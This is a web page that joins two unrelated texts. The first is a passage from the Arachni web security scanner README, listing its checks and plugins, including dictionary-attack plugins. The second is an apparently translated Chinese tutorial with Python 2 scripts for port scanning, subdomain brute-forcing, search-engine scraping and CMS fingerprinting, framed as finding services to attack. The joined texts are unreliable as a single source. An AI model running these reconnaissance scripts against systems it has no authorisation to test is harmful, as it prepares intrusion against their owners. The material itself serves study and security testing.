  • Proxy support for SOCKS4, SOCKS4A, SOCKS5, HTTP/1.1 and HTTP/1.0.
  • Proxy authentication.
  • Site authentication (SSL-based, form-based, Cookie-Jar, Basic-Digest, NTLMv1, Kerberos and others).
  • Automatic log-out detection and re-login during the scan (when the initial login was performed via the autologin, login_script or proxy plugins).
  • Custom 404 page detection.
  • UI abstraction:
  • Pause/resume functionality.
  • Hibernation support -- Suspend to and restore from disk.
  • High performance asynchronous HTTP requests.
    • With adjustable concurrency.
    • With the ability to auto-detect server health and adjust its concurrency automatically.
  • Support for custom default input values, using pairs of patterns (to be matched against input names) and values to be used to fill in matching inputs.

Integrated browser environment

Arachni includes an integrated, real browser environment in order to provide sufficient coverage to modern web applications which make use of technologies such as HTML5, JavaScript, DOM manipulation, AJAX, etc.

In addition to the monitoring of the vanilla DOM and JavaScript environments, Arachni's browsers also hook into popular frameworks to make the logged data easier to digest:

In essence, this turns Arachni into a DOM and JavaScript debugger, allowing it to monitor DOM events and JavaScript data and execution flows. As a result, not only can the system trigger and identify DOM-based issues, but it will accompany them with a great deal of information regarding the state of the page at the time.

Relevant information include:

  • Page DOM, as HTML code.
    • With a list of DOM transitions required to restore the state of the page to the one at the time it was logged.
  • Original DOM (i.e. prior to the action that caused the page to be logged), as HTML code.
    • With a list of DOM transitions.
  • Data-flow sinks -- Each sink is a JS method which received a tainted argument.
    • Parent object of the method (ex.: DOMWindow).
    • Method signature (ex.: decodeURIComponent()).
    • Arguments list.
      • With the identified taint located recursively in the included objects.
    • Method source code.
    • JS stacktrace.
  • Execution flow sinks -- Each sink is a successfully executed JS payload, as injected by the security checks.
    • Includes a JS stacktrace.
  • JavaScript stack-traces include:
    • Method names.
    • Method locations.
    • Method source codes.
    • Argument lists.

In essence, you have access to roughly the same information that your favorite debugger (for example, FireBug) would provide, as if you had set a breakpoint to take place at the right time for identifying an issue.

Browser-cluster

The browser-cluster is what coordinates the browser analysis of resources and allows the system to perform operations which would normally be quite time consuming in a high-performance fashion.

Configuration options include:

  • Adjustable pool-size, i.e. the amount of browser workers to utilize.
  • Timeout for each job.
  • Worker TTL counted in jobs -- Workers which exceed the TTL have their browser process respawned.
  • Ability to disable loading images.
  • Adjustable screen width and height.
    • Can be used to analyze responsive and mobile applications.
  • Ability to wait until certain elements appear in the page.
  • Configurable local storage data.

Coverage

The system can provide great coverage to modern web applications due to its integrated browser environment. This allows it to interact with complex applications that make heavy use of client-side code (like JavaScript) just like a human would.

In addition to that, it also knows which browser state changes the application has been programmed to handle and is able to trigger them programmatically in order to provide coverage for a full set of possible scenarios.

By inspecting all possible pages and their states (when using client-side code) Arachni is able to extract and audit the following elements and their inputs:

  • Forms
    • Along with ones that require interaction via a real browser due to DOM events.
  • User-interface Forms
    • Input and button groups which don't belong to an HTML <form> element but are instead associated via JS code.
  • User-interface Inputs
    • Orphan <input> elements with associated DOM events.
  • Links
    • Along with ones that have client-side parameters in their fragment, i.e.: http://example.com/#/?param=val&param2=val2
    • With support for rewrite rules.
  • LinkTemplates -- Allowing for extraction of arbitrary inputs from generic paths, based on user-supplied templates -- useful when rewrite rules are not available.
    • Along with ones that have client-side parameters in their URL fragments, i.e.: http://example.com/#/param/val/param2/val2
  • Cookies
  • Headers
  • Generic client-side elements which have associated DOM events.
  • AJAX-request parameters.
  • JSON request data.
  • XML request data.

Open distributed architecture

Arachni is designed to fit into your workflow and easily integrate with your existing infrastructure.

Depending on the level of control you require over the process, you can either choose the REST service or the custom RPC protocol.

Both approaches allow you to:

  • Remotely monitor and manage scans.
  • Perform multiple scans at the same time -- Each scan is compartmentalized to its own OS process to take advantage of:
    • Multi-core/SMP architectures.
    • OS-level scheduling/restrictions.
    • Sandboxed failure propagation.
  • Communicate over a secure channel.

REST API

  • Very simple and straightforward API (a hedged client sketch in Python follows this list).
  • Easy interoperability with non-Ruby systems.
    • Operates over HTTP.
    • Uses JSON to format messages.
  • Stateful scan monitoring.
    • Unique sessions automatically only receive updates when polling for progress, rather than full data.
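
For readers integrating with the REST service, a minimal Python 3 client sketch is shown below. The port, the /scans endpoint paths and the JSON field names are assumptions made for illustration only; they are not specified in this README, so check the Arachni REST API documentation for the actual routes and payloads.

# Minimal client sketch for an HTTP+JSON scan service such as the REST
# interface described above. Endpoint paths, the port and the JSON field
# names are assumptions for illustration, not documented API facts.
import time

import requests

BASE = "http://127.0.0.1:7331"  # assumed address/port of a locally running REST service


def run_scan(target_url):
    # Start a scan; the service is assumed to answer with a JSON body
    # containing an identifier for the newly created scan.
    resp = requests.post(f"{BASE}/scans", json={"url": target_url})
    resp.raise_for_status()
    scan_id = resp.json()["id"]

    # Poll the scan resource until it reports completion. The exact field
    # to test ("status", "busy", ...) is an assumption in this sketch.
    while True:
        progress = requests.get(f"{BASE}/scans/{scan_id}").json()
        if progress.get("status") == "done":
            break
        time.sleep(5)

    # Fetch the final report as JSON once the scan has finished.
    return requests.get(f"{BASE}/scans/{scan_id}/report.json").json()


if __name__ == "__main__":
    print(run_scan("http://example.com/"))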

RPC API

  • High-performance/low-bandwidth communication protocol.
    • MessagePack serialization for performance, efficiency and ease of integration with 3rd party systems.
  • Grid:
    • Self-healing.
    • Scale up/down by hot-plugging/hot-unplugging nodes.
      • Can scale up infinitely by adding nodes to increase scan capacity.
    • (Always-on) Load-balancing -- All Instances are automatically provided by the least burdened Grid member.
      • With optional per-scan opt-out/override.
    • (Optional) High-Performance mode -- Combines the resources of multiple nodes to perform multi-Instance scans.
      • Enabled on a per-scan basis.

Scope configuration

  • Filters for redundant pages like galleries, catalogs, etc. based on regular expressions and counters.
    • Can optionally detect and ignore redundant pages automatically.
  • URL exclusion filters using regular expressions.
  • Page exclusion filters based on content, using regular expressions.
  • URL inclusion filters using regular expressions.
  • Can be forced to only follow HTTPS paths and not downgrade to HTTP.
  • Can optionally follow subdomains.
  • Adjustable page count limit.
  • Adjustable redirect limit.
  • Adjustable directory depth limit.
  • Adjustable DOM depth limit.
  • Adjustment using URL-rewrite rules.
  • Can read paths from multiple user supplied files (to both restrict and extend the scope).

Audit

  • Can audit:
    • Forms
      • Can automatically refresh nonce tokens.
      • Can submit them via the integrated browser environment.
    • User-interface Forms
      • Input and button groups which don't belong to an HTML <form> element but are instead associated via JS code.
    • User-interface Inputs
      • Orphan <input> elements with associated DOM events.
    • Links
      • Can load them via the integrated browser environment.
    • LinkTemplates
      • Can load them via the integrated browser environment.
    • Cookies
      • Can load them via the integrated browser environment.
    • Headers
    • Generic client-side DOM elements.
    • JSON request data.
    • XML request data.
  • Can ignore binary/non-text pages.
  • Can audit elements using both GET and POST HTTP methods.
  • Can inject both raw and HTTP encoded payloads.
  • Can submit all links and forms of the page along with the cookie permutations to provide extensive cookie-audit coverage.
  • Can exclude specific input vectors by name.
  • Can include specific input vectors by name.

Components

Arachni is a highly modular system, employing several components of distinct types to perform its duties.

In addition to enabling or disabling the bundled components so as to adjust the system's behavior and features as needed, functionality can be extended via the addition of user-created components to suit almost every need.

Platform fingerprinters

In order to make efficient use of the available bandwidth, Arachni performs rudimentary platform fingerprinting and tailors the audit process to the server-side deployed technologies by only using applicable payloads.

Currently, the following platforms can be identified:

  • Operating systems
    • BSD
    • Linux
    • Unix
    • Windows
    • Solaris
  • Web servers
    • Apache
    • IIS
    • Nginx
    • Tomcat
    • Jetty
    • Gunicorn
  • Programming languages
    • PHP
    • ASP
    • ASPX
    • Java
    • Python
    • Ruby
  • Frameworks
    • Rack
    • CakePHP
    • Rails
    • Django
    • ASP.NET MVC
    • JSF
    • CherryPy
    • Nette
    • Symfony

The user also has the option of specifying extra platforms (like a DB server) in order to help the system be as efficient as possible. Alternatively, fingerprinting can be disabled altogether.

Finally, Arachni will always err on the side of caution and send all available payloads when it fails to identify specific platforms.

Checks

Checks are system components which perform security checks and log issues.

Active

Active checks engage the web application via its inputs.

  • SQL injection (sql_injection) -- Error based detection.
    • Oracle
    • InterBase
    • PostgreSQL
    • MySQL
    • MSSQL
    • EMC
    • SQLite
    • DB2
    • Informix
    • Firebird
    • SAP MaxDB
    • Sybase
    • Frontbase
    • Ingres
    • HSQLDB
    • MS Access
  • Blind SQL injection using differential analysis (sql_injection_differential).
  • Blind SQL injection using timing attacks (sql_injection_timing).
    • MySQL
    • PostgreSQL
    • MSSQL
  • NoSQL injection (no_sql_injection) -- Error based vulnerability detection.
  • Blind NoSQL injection using differential analysis (no_sql_injection_differential).
  • CSRF detection (csrf).
  • Code injection (code_injection).
    • PHP
    • Ruby
    • Python
    • Java
    • ASP
  • Blind code injection using timing attacks (code_injection_timing).
    • PHP
    • Ruby
    • Python
    • Java
    • ASP
  • LDAP injection (ldap_injection).
  • Path traversal (path_traversal).
    • *nix
    • Windows
    • Java
  • File inclusion (file_inclusion).
    • *nix
    • Windows
    • Java
    • PHP
    • Perl
  • Response splitting (response_splitting).
  • OS command injection (os_cmd_injection).
    • *nix
    • *BSD
    • IBM AIX
    • Windows
  • Blind OS command injection using timing attacks (os_cmd_injection_timing).
    • Linux
    • *BSD
    • Solaris
    • Windows
  • Remote file inclusion (rfi).
  • Unvalidated redirects (unvalidated_redirect).
  • Unvalidated DOM redirects (unvalidated_redirect_dom).
  • XPath injection (xpath_injection).
    • Generic
    • PHP
    • Java
    • dotNET
    • libXML2
  • XSS (xss).
  • Path XSS (xss_path).
  • XSS in event attributes of HTML elements (xss_event).
  • XSS in HTML tags (xss_tag).
  • XSS in script context (xss_script_context).
  • DOM XSS (xss_dom).
  • DOM XSS script context (xss_dom_script_context).
  • Source code disclosure (source_code_disclosure)
  • XML External Entity (xxe).
    • Linux
    • *BSD
    • Solaris
    • Windows
Passive

Passive checks look for the existence of files, folders and signatures.

  • Allowed HTTP methods (allowed_methods).
  • Back-up files (backup_files).
  • Backup directories (backup_directories)
  • Common administration interfaces (common_admin_interfaces).
  • Common directories (common_directories).
  • Common files (common_files).
  • HTTP PUT (http_put).
  • Insufficient Transport Layer Protection for password forms (unencrypted_password_form).
  • WebDAV detection (webdav).
  • HTTP TRACE detection (xst).
  • Credit Card number disclosure (credit_card).
  • CVS/SVN user disclosure (cvs_svn_users).
  • Private IP address disclosure (private_ip).
  • Common backdoors (backdoors).
  • .htaccess LIMIT misconfiguration (htaccess_limit).
  • Interesting responses (interesting_responses).
  • HTML object grepper (html_objects).
  • E-mail address disclosure (emails).
  • US Social Security Number disclosure (ssn).
  • Forceful directory listing (directory_listing).
  • Mixed Resource/Scripting (mixed_resource).
  • Insecure cookies (insecure_cookies).
  • HttpOnly cookies (http_only_cookies).
  • Auto-complete for password form fields (password_autocomplete).
  • Origin Spoof Access Restriction Bypass (origin_spoof_access_restriction_bypass)
  • Form-based upload (form_upload)
  • localstart.asp (localstart_asp)
  • Cookie set for parent domain (cookie_set_for_parent_domain)
  • Missing Strict-Transport-Security headers for HTTPS sites (hsts).
  • Missing X-Frame-Options headers (x_frame_options).
  • Insecure CORS policy (insecure_cors_policy).
  • Insecure cross-domain policy (allow-access-from) (insecure_cross_domain_policy_access)
  • Insecure cross-domain policy (allow-http-request-headers-from) (insecure_cross_domain_policy_headers)
  • Insecure client-access policy (insecure_client_access_policy)

Reporters

Plugins

Plugins add extra functionality to the system in a modular fashion, this way the core remains lean and makes it easy for anyone to add arbitrary functionality.

  • Passive Proxy (proxy) -- Analyzes requests and responses between the web app and the browser assisting in AJAX audits, logging-in and/or restricting the scope of the audit.
  • Form based login (autologin).
  • Script based login (login_script).
  • Dictionary attacker for HTTP Auth (http_dicattack).
  • Dictionary attacker for form based authentication (form_dicattack).
  • Cookie collector (cookie_collector) -- Keeps track of cookies while establishing a timeline of changes.
  • WAF (Web Application Firewall) Detector (waf_detector) -- Establishes a baseline of normal behavior and uses rDiff analysis to determine if malicious inputs cause any behavioral changes.
  • BeepNotify (beep_notify) -- Beeps when the scan finishes.
  • EmailNotify (email_notify) -- Sends a notification (and optionally a report) over SMTP at the end of the scan.
  • VectorFeed (vector_feed) -- Reads in vector data from which it creates elements to be audited. Can be used to perform extremely specialized/narrow audits on a per vector/element basis. Useful for unit-testing or a gazillion other things.
  • Script (script) -- Loads and runs an external Ruby script under the scope of a plugin, used for debugging and general hackery.
  • Uncommon headers (uncommon_headers) -- Logs uncommon headers.
  • Content-types (content_types) -- Logs content-types of server responses aiding in the identification of interesting (possibly leaked) files.
  • Vector collector (vector_collector) -- Collects information about all seen input vectors which are within the scan scope.
  • Headers collector (headers_collector) -- Collects response headers based on specified criteria.
  • Exec (exec) -- Calls external executables at different scan stages.
  • Metrics (metrics) -- Captures metrics about multiple aspects of the scan and the web application.
  • Restrict to DOM state (restrict_to_dom_state) -- Restricts the audit to a single page's DOM state, based on a URL fragment.
  • Webhook notify (webhook_notify) -- Sends a webhook payload over HTTP at the end of the scan.
  • Rate limiter (rate_limiter) -- Rate limits HTTP requests.
  • Page dump (page_dump) -- Dumps page data to disk as YAML.
Defaults

Default plugins will run for every scan and are placed under /plugins/defaults/.

  • AutoThrottle (autothrottle) -- Dynamically adjusts HTTP throughput during the scan for maximum bandwidth utilization.
  • Healthmap (healthmap) -- Generates a sitemap showing the health of each crawled/audited URL.
Meta

Plugins under /plugins/defaults/meta/ perform analysis on the scan results to determine trustworthiness or just add context information or general insights.

  • TimingAttacks (timing_attacks) -- Provides a notice for issues uncovered by timing attacks when the affected audited pages returned unusually high response times to begin with. It also points out the danger of DoS attacks against pages that perform heavy-duty processing.
  • Discovery (discovery) -- Performs anomaly detection on issues logged by discovery checks and warns of the possibility of false positives where applicable.
  • Uniformity (uniformity) -- Reports inputs that are uniformly vulnerable across a number of pages hinting to the lack of a central point of input sanitization.

Trainer subsystem

The Trainer is what enables Arachni to learn from the scan it performs and incorporate that knowledge, on the fly, for the duration of the audit.

Checks have the ability to individually force the Framework to learn from the HTTP responses they are going to induce.

However, this is usually not required since Arachni is aware of which requests are more likely to uncover new elements or attack vectors and will adapt itself accordingly.

Still, this can be an invaluable asset to Fuzzer checks.

Running the specs

You can run rake spec to run all specs or you can run them selectively using the following:

rake spec:core            # for the core libraries
rake spec:checks          # for the checks
rake spec:plugins         # for the plugins
rake spec:reports         # for the reports
rake spec:path_extractors # for the path extractors

Please be warned, the core specs will require a beast of a machine due to the necessity to test the Grid/multi-Instance features of the system.

Note: The check specs will take many hours to complete due to the timing-attack tests.

Bug reports/Feature requests

Submit bugs using GitHub Issues and get support via the Support Portal.

Contributing

(Before starting any work, please read the instructions for working with the source code.)

We're happy to accept help from fellow code-monkeys and these are the steps you need to follow in order to contribute code:

  • Fork the project.
  • Start a feature branch based on the experimental branch (git checkout -b <feature-name> experimental).
  • Add specs for your code.
  • Run the spec suite to make sure you didn't break anything (rake spec:core for the core libs or rake spec for everything).
  • Commit and push your changes.
  • Issue a pull request and wait for your code to be reviewed.

License

Arachni Public Source License v1.0 -- please see the LICENSE file for more information.


          The Way of Python, Farewell to Script Kiddies series --- Writing information-gathering scripts (Part 1)      Cache   Translate Page   Web Page Cache   
Original author: 阿甫哥哥. This article is part of the i春秋 (ichunqiu) original content reward program; reproduction without permission is prohibited.
image
0x01 Preface
After you have collected URLs, the next thing to do is gather information about the target's assets. The better the collection, the more vulnerabilities you will dig up... Of course, the precondition for all of this is patience! Since there are quite a few tools to write, I will split this into two parts...
0x02 Writing a port scanning script

image
How port scanning works:
Port scanning, as the name implies, means scanning a range of ports, or specified ports, one by one. From the scan results you can learn which services a computer provides, and you can then attack it through known vulnerabilities in those services. The principle is that when a host asks a remote server to establish a connection to a certain port, the server will answer if it provides that service; if the service is not installed, there will be no answer even though you send requests to the corresponding port. Using this principle, if you try to establish connections to all well-known ports, or to well-known ports within a chosen range, and record the answers given by the remote server, then by examining the records you can tell which services are installed on the target server. This is port scanning, and through it you can gather a lot of valuable reference information about the target host, for example whether it provides FTP, WWW or other services.

Proxy servers also have many commonly used ports.
For example, HTTP commonly uses 80/8080/3128/8081/9080, FTP commonly uses 21, Telnet commonly uses 23, and so on.
Here is a fairly complete list...
[AppleScript]
Proxy servers commonly use the following ports:
(1) Common ports for HTTP proxy servers: 80/8080/3128/8081/9080
(2) Common port for SOCKS proxy servers: 1080
(3) Common port for FTP (file transfer) proxy servers: 21
(4) Common port for Telnet (remote login) proxy servers: 23
HTTP server: default port 80/tcp (the Executor trojan opens this port);
HTTPS (securely transferring web pages) server: default port 443/tcp, 443/udp;
Telnet (insecure text transfer): default port 23/tcp (opened by the Tiny Telnet Server trojan);
FTP: default port 21/tcp (opened by the Doly Trojan, Fore, Invisible FTP, WebEx, WinCrash and Blade Runner trojans);
TFTP (Trivial File Transfer Protocol): default port 69/udp;
SSH (secure login), SCP (file transfer), port redirection: default port 22/tcp;
SMTP, Simple Mail Transfer Protocol (e-mail): default port 25/tcp (the Antigen, Email Password Sender, Haebu Coceda, Shtrilitz Stealth, WinPC and WinSpy trojans all open this port);
POP3, Post Office Protocol (e-mail): default port 110/tcp;
WebLogic: default port 7001;
WebSphere application: default port 9080;
WebSphere administration tool: default port 9090;
JBoss: default port 8080;
Tomcat: default port 8080;
Windows 2003 remote login (RDP): default port 3389;
Symantec AV/Filter for MSE: default port 8081;
Oracle database: default port 1521;
Oracle EMCTL: default port 1158;
Oracle XDB (XML database): default port 8080;
Oracle XDB FTP service: default port 2100;
MS SQL Server database server: default port 1433/tcp, 1433/udp;
MS SQL Server database monitor: default port 1434/tcp, 1434/udp;
QQ: default port 1080/udp
And so on; search for a fuller list if you need more detail, haha.

The three port states (a hedged probing sketch follows this list)
OPEN  -- the port is reachable and a process is listening on it
CLOSED  -- the port is reachable but nothing is listening, so the connection is refused
FILTERED  -- no reply comes back at all, typically because a firewall/WAF drops the probe
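
To make these states concrete, here is a minimal Python 3 sketch (the article's own code is Python 2) that classifies one port from the result of a single TCP connect attempt; the mapping of error codes to states is a simplification of what a scanner like nmap actually does.
[Python]
# Probe a single TCP port and map the outcome onto the three states above.
# Simplification (assumption): a refused connection is reported as CLOSED and
# a timeout/unreachable result as FILTERED; real scanners use more signals
# (SYN scans, ICMP responses, retries) to make this call.
import errno
import socket

def probe(host, port, timeout=2.0):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    try:
        code = s.connect_ex((host, port))  # 0 on success, an errno value otherwise
    except socket.timeout:
        code = errno.ETIMEDOUT
    finally:
        s.close()
    if code == 0:
        return "OPEN"
    if code == errno.ECONNREFUSED:
        return "CLOSED"
    # Timeouts, unreachable hosts and "would block" results are treated as filtered.
    return "FILTERED"

if __name__ == "__main__":
    for p in (22, 80, 443, 3306):
        print(p, probe("127.0.0.1", p))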

Here is an example using a well-known tool, nmap...
[AppleScript]
C:\Users\Administrator>nmap -sV localhost
Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-03 17:10 China Standard Time
Nmap scan report for localhost (127.0.0.1)
Host is up (0.00053s latency).
Other addresses for localhost (not scanned): ::1
Not shown: 990 closed ports
PORT      STATE SERVICE           VERSION
80/tcp    open  http              Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2j PHP/5.4.45)
135/tcp   open  msrpc             Microsoft Windows RPC
443/tcp   open  ssl/https         VMware Workstation SOAP API 14.1.1
445/tcp   open  microsoft-ds      Microsoft Windows 7 - 10 microsoft-ds (workgroup: WorkGroup)
903/tcp   open  ssl/vmware-auth   VMware Authentication Daemon 1.10 (Uses VNC, SOAP)
1080/tcp  open  http-proxy        Polipo
3306/tcp  open  mysql             MySQL 5.5.53
8088/tcp  open  radan-http?
10000/tcp open  snet-sensor-mgmt?
65000/tcp open  tcpwrapped

That is enough background; let's implement it in Python. There are many modules in Python that can be used for port scanning; this article uses the socket module. The single-threaded approach was covered in a previous article, see:
一个精壮的代购骗子被我彻底征服
[Python]
#-*- coding: UTF-8 -*-
import socket
 
def Get_ip(domain):  
    try:  
        return socket.gethostbyname(domain)  
    except socket.error,e:  
        print '%s: %s'%(domain,e)  
        return 0 
 
def PortScan(ip):
    result_list=list()
    port_list=range(1,65535)
    for port in port_list:
        try:
            s=socket.socket() 
            s.settimeout(0.1)
            s.connect((ip,port))
            openstr= " PORT:"+str(port) +" OPEN "
            print openstr
            result_list.append(port)
            s.close()
        except:
            pass
    print result_list
def main():
    domain = raw_input("PLEASE INPUT YOUR TARGET:")
    ip = Get_ip(domain)
    print 'IP:'+ip
    PortScan(ip)
if __name__=='__main__':  
    main()

Isn't that painfully slow? Since this series is about saying farewell to script kiddies, a single-threaded scanner obviously won't do, haha.
Here is the multithreaded version:
[Python]
#-*- coding: UTF-8 -*-
import socket
import threading

lock = threading.Lock()
threads = []
def Get_ip(domain):  
    try:  
        return socket.gethostbyname(domain)  
    except socket.error,e:  
        print '[-]%s: %s'%(domain,e)  
        return 0 
 
def PortScan(ip,port):
    try:
        s=socket.socket() 
        s.settimeout(0.1)
        s.connect((ip,port))
        lock.acquire()
        openstr= "[-] PORT:"+str(port) +" OPEN "
        print openstr
        lock.release()
        s.close()
    except:
        pass
def main():
    banner = '''
                      _                       
     _ __   ___  _ __| |_ ___  ___ __ _ _ __  
    | '_ \ / _ \| '__| __/ __|/ __/ _` | '_ \ 
    | |_) | (_) | |  | |_\__ \ (_| (_| | | | |
    | .__/ \___/|_|   \__|___/\___\__,_|_| |_|
    |_|                                       

            '''
    print banner
    domain = raw_input("PLEASE INPUT YOUR TARGET:")
    ip = Get_ip(domain)
    print '[-] IP:'+ip
    for n in range(1,76):
        for p in range((n-1)*880,n*880):
            t = threading.Thread(target=PortScan,args=(ip,p))
            threads.append(t)
            t.start()     

        for t in threads:
            t.join()
    print ' This scan completed !'
if __name__=='__main__':  
    main()
image
This is very simple; I hardly know what more to explain... If your fundamentals are not yet solid, please move on to the beginner series:
Python大法从入门到编写POC
0x03 Writing a subdomain collection script
image
Collecting subdomains lets you discover more domains or subdomains within the scope of a test, which increases the odds of finding vulnerabilities. There are many collection methods; this article will not describe them all, and you can refer to this article for ideas:
子域名搜集思路与技巧梳理
Honestly, lijiejie's subdomainbrute is good enough... and of course i春秋 (ichunqiu) also has video tutorials...
Python安全工具开发应用
This article demonstrates three approaches.
The first is brute forcing with a wordlist; this method relies mainly on the dictionary, and how much you collect depends on its size...
Here is a single-threaded demo:
[Python]
#-*- coding: UTF-8 -*-
import requests
import re
import sys

def writtarget(target):
        print target
        file = open('result.txt','a')
        with file as f:
                f.write(target+'\n')

        file.close()


def targetopen(httptarget , httpstarget):


        header = {
                        'Connection': 'keep-alive',
                        'Pragma': 'no-cache',
                        'Cache-Control': 'no-cache',
                        'Upgrade-Insecure-Requests': '1',
                        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36',
                        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
                        'DNT': '1',
                        'Accept-Encoding': 'gzip, deflate',
                        'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8'
                }

        try:
                reponse_http = requests.get(httptarget, timeout=3, headers=header)
                code_http = reponse_http.status_code


                if (code_http == 200):
                        httptarget_result = re.findall('//.*', httptarget)

                        writtarget(httptarget_result[0][2:])

                else:
                        reponse_https = requests.get(httpstarget, timeout=3, headers=header)
                        code_https = reponse_https.status_code
                        if (code_https == 200):
                                httpstarget_result = re.findall('//.*', httpstarget)

                                writtarget(httpstarget_result[0][2:])


        except:
                pass

def domainscan(target):

        f = open('domain.txt','r')
        for line in f:
                httptarget_result = 'http://'+ line.strip() + '.'+target
                httpstarget_result = 'https://'+ line.strip() + '.'+target

                targetopen(httptarget_result, httpstarget_result)

        f.close()

if __name__ == "__main__":
        print ' ____                        _       ____             _       '
        print '|  _ \  ___  _ __ ___   __ _(_)_ __ | __ ) _ __ _   _| |_ ___ '
        print "| | | |/ _ \| '_ ` _ \ / _` | | '_ \|  _ \| '__| | | | __/ _ \  "
        print "| |_| | (_) | | | | | | (_| | | | | | |_) | |  | |_| | ||  __/"
        print '|____/ \___/|_| |_| |_|\__,_|_|_| |_|____/|_|   \__,_|\__\___|'
                                                              


        file = open('result.txt','w+')
        file.truncate()
        file.close()
        target = raw_input('PLEASE INPUT YOUR DOMAIN(Eg:ichunqiu.com):')
        print 'Starting.........'
        domainscan(target)
        print 'Done ! Results in result.txt'

image
The second approach collects subdomains through search engines, although some subdomains are never indexed by them...

See this article:
工具| 手把手教你信息收集之子域名收集器
I think that article explains it reasonably well... I'm too lazy to rewrite it, so I'll just paste the code here:

[Python]
#-*-coding:utf-8-*-
import requests
import re
key="qq.com"
sites=[]
match='style="text-decoration:none;">(.*?)/'
for i in range(48):
   i=i*10
   url="http://www.baidu.com.cn/s?wd=site:"+key+"&cl=3&pn=%s"%i
   response=requests.get(url).content
   subdomains=re.findall(match,response)
   sites += list(subdomains)
site=list(set(sites))   # set() removes duplicates
print site
print "The number of sites is %d"%len(site)
for i in site:          
   print i

The third approach goes through third-party websites; the implementation is similar to the second.
It was covered in a previous article, so I'll just quote it here.
If you're not sure how, read this article, it is very detailed...
Python大法之从HELL0 MOMO到编写POC(五)
[Python]
import requests
import re
import sys
 
def get(domain):
        url = 'http://i.links.cn/subdomain/'
        payload = ("domain={domain}&b2=1&b3=1&b4=1".format(domain=domain))
        r = requests.post(url=url,params=payload)
        con = r.text.encode('ISO-8859-1')
        a = re.compile('value="(.+?)"><input')
        result = a.findall(con)
        list = '\n'.join(result)
        print list
if __name__ == '__main__':
        command= sys.argv[1:]
        f = "".join(command)
        get(f)

0x04 Writing a CMS fingerprinting script
image
There are many open-source fingerprinting programs nowadays, such as w3af, whatweb, wpscan and joomscan. The common identification approaches are the following (a hedged sketch of approach 2 follows this list):
1: Keywords found in the page
2: The MD5 of specific files (mainly static files; it does not have to be MD5)
3: Keywords at specified URLs
4: TAG patterns at specified URLs
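
The rest of this section implements keyword-based matching (approaches 1 and 3); approach 2 is not implemented in the article, so here is a rough Python 3 sketch of the idea (the article's own code is Python 2). The paths and MD5 values in FINGERPRINTS below are placeholders, not real fingerprints.
[Python]
# Sketch of approach 2: fetch known static files and compare their MD5 digests
# against precomputed values. The FINGERPRINTS table is a made-up placeholder;
# a real table has to be built from files shipped with known CMS releases.
import hashlib
import requests

FINGERPRINTS = {
    # path: {md5_of_file: cms_name} -- hypothetical sample entries
    "/misc/drupal.js": {"0123456789abcdef0123456789abcdef": "Drupal (placeholder hash)"},
    "/wp-includes/js/wp-emoji-release.min.js": {"fedcba9876543210fedcba9876543210": "WordPress (placeholder hash)"},
}

def md5_fingerprint(base_url, timeout=5):
    base_url = base_url.rstrip("/")
    for path, known in FINGERPRINTS.items():
        try:
            r = requests.get(base_url + path, timeout=timeout)
        except requests.RequestException:
            continue
        if r.status_code != 200:
            continue
        digest = hashlib.md5(r.content).hexdigest()
        if digest in known:
            return known[digest]
    return None

if __name__ == "__main__":
    print(md5_fingerprint("http://www.example.com") or "Unidentified")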

i春秋 (ichunqiu) also has a corresponding course:
Python安全工具开发应用
In the spirit of not being able to afford the course, haha, I won't cover the method that instructor ADO teaches... haha.
The implementations are all pretty similar anyway, just using different modules...
This article introduces two methods: one goes through an API, and the other is pure fingerprint matching, where how much you can identify depends on the size of the dictionary...
First, the API method...
Put simply, you send a POST request and pull the keyword out of the response; there is no difficulty at all.
The fingerprinting site I use is http://whatweb.bugscaner.com/look/ (somehow this feels like advertising...). Capture the request with a proxy, and then it is the same old routine.
image
[Python]
#-*- coding: UTF-8 -*-
import requests
import json

def what_cms(url):
        headers = {
                'Connection': 'keep-alive',
                'Pragma': 'no-cache',
                'Cache-Control': 'no-cache',
                'Upgrade-Insecure-Requests': '1',
                'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36',
                'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
                'DNT': '1',
                'Accept-Encoding': 'gzip, deflate',
                'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8'
                    }
        post={
                'hash':'0eca8914342fc63f5a2ef5246b7a3b14_7289fd8cf7f420f594ac165e475f1479',
                'url':url,
        }
        r=requests.post(url='http://whatweb.bugscaner.com/what/', data=post, headers=headers)
        dic=json.loads(r.text)
        if dic['cms']=='':
                print 'Sorry,Unidentified........'
        else:
                print 'CMS:' + dic['cms']
if __name__ == '__main__':
        url=raw_input('PLEASE INPUT YOUR TARGET:')
        what_cms(url)


Cool.
image


Next comes the second method of CMS fingerprinting...
I use the keyword matching approach...
I found a matching dictionary for DedeCMS.
[AppleScript]
Format: path||||keyword||||CMS name
/data/admin/allowurl.txt||||dedecms||||DedeCMS(织梦)
/data/index.html||||dedecms||||DedeCMS(织梦)
/data/js/index.html||||dedecms||||DedeCMS(织梦)
/data/mytag/index.html||||dedecms||||DedeCMS(织梦)
/data/sessions/index.html||||dedecms||||DedeCMS(织梦)
/data/textdata/index.html||||dedecms||||DedeCMS(织梦)
/dede/action/css_body.css||||dedecms||||DedeCMS(织梦)
/dede/css_body.css||||dedecms||||DedeCMS(织梦)
/dede/templets/article_coonepage_rule.htm||||dedecms||||DedeCMS(织梦)
/include/alert.htm||||dedecms||||DedeCMS(织梦)
/member/images/base.css||||dedecms||||DedeCMS(织梦)
/member/js/box.js||||dedecms||||DedeCMS(织梦)
/php/modpage/readme.txt||||dedecms||||DedeCMS(织梦)
/plus/sitemap.html||||dedecms||||DedeCMS(织梦)
/setup/license.html||||dedecms||||DedeCMS(织梦)
/special/index.html||||dedecms||||DedeCMS(织梦)
/templets/default/style/dedecms.css||||dedecms||||DedeCMS(织梦)
/company/template/default/search_list.htm||||dedecms||||DedeCMS(织梦)

